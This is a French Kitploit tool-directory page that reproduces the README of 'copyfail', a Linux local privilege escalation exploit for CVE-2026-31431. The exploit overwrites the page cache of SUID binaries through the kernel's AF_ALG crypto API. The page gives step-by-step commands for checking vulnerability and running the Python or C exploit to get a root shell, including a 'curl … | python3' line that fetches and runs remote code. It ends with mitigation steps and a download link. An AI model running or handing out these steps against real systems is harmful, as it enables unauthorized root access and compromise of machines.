Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
copyfail — Exploit d'élévation de privilèges local sous Linux pour CVE-2026-31431, écrasant le cache de pages des binaires SUID via l'API cryptographique du noyau AF_ALG afin d'obtenir un accès root. | Kitploit
Outils/GitHubGitHub/minime794/copyfail
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation de Binaires
GitHubminime794/copyfail

copyfail

Exploit d'élévation de privilèges local sous Linux pour CVE-2026-31431, écrasant le cache de pages des binaires SUID via l'API cryptographique du noyau AF_ALG afin d'obtenir un accès root.

Voir le dépôt
il y a 7h 25mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Copy Fail (CVE-2026-31431) – Guide d'utilisation de l'exploit

Readme original tiré de @painoob

Toutes les versions du noyau depuis 2017 / 2016 sont vulnérables ! Le noyau 7 est totalement immunisé, les autres (entre 5 et 7 peuvent encore être vulnérables)

⚠️ Avertissement

Ce contenu est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Ne l'exécutez PAS sur des systèmes sans autorisation explicite.


📌 Aperçu

Copy Fail (CVE-2026-31431) est une vulnérabilité d'élévation de privilèges locale (LPE) sous Linux affectant l'API crypto du noyau via AF_ALG.

Elle permet à un utilisateur non privilégié d'écraser les données du cache de pages d'un binaire SUID (par exemple, /usr/bin/su) et d'obtenir un accès root.


🧠 Prérequis

Configuration système requise

  • Noyau Linux (vulnérable – dépend de l'état du correctif)
  • AF_ALG activé
  • Module algif_aead chargé

Prérequis pour l'exploit Python

  • Python 3.10+
  • Prise en charge de :
    • os.splice
    • socket(AF_ALG)

🔍 Vérification de la vulnérabilité

root@kitploit:~
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

Indicateurs attendus :

  • authencesn(hmac(sha256),cbc(aes))
  • algif_aead chargé

🐍 Exécution de l'exploit Python

1. Exécution directe

root@kitploit:~
python3 copy_fail_exp.py

2. Ou via curl (si hébergé à distance)

root@kitploit:~
curl https://copy.fail/exp | python3

3. Déclencher un shell root

root@kitploit:~
su
id

Résultat attendu :

root@kitploit:~
uid=0(root)

⚠️ Problèmes courants (Python)

❌ Erreur : os.splice not found

Cause :

  • Version de Python < 3.10
  • Build restreint

Solution :

  • Utiliser un binaire Python plus récent
  • Téléverser un interpréteur Python statique

⚙️ Compilation de la version C

1. Compiler

root@kitploit:~
gcc copy_fail_exp.c -o copy_fail

2. Rendre exécutable

root@kitploit:~
chmod +x copy_fail

3. Exécuter l'exploit

root@kitploit:~
./copy_fail
su

⚠️ Problèmes courants (C)

❌ L'exploit s'exécute mais pas de root

Causes possibles :

  • Noyau corrigé
  • Décalages incorrects
  • Environnement incompatible

❌ Erreurs de compilation

Installez les outils requis :

root@kitploit:~
apt update && apt install build-essential

🧪 Dépannage

Vérifier si le système est corrigé

root@kitploit:~
dmesg | grep -i alg

Vérifier le module

root@kitploit:~
lsmod | grep algif_aead

🛡️ Atténuation

Désactiver le module vulnérable

root@kitploit:~
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

Appliquer le correctif du noyau

Mettez à jour votre système :

root@kitploit:~
apt update && apt upgrade

📌 Remarques

  • L'exploit modifie uniquement le cache de pages (non persistant)
  • Nécessite un accès local
  • Non exploitable à distance par défaut

🧠 Conclusion

Si l'exploit échoue, envisagez :

  • Noyau déjà corrigé
  • Restrictions de l'environnement
  • Autres vecteurs d'élévation de privilèges (SUID, capabilities, mauvaise configuration de sudo)

📚 Références

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 Notes de l'auteur

Utilisez cet exploit de manière responsable uniquement dans des laboratoires, des CTF et des pentests autorisés.

Télécharger l’outil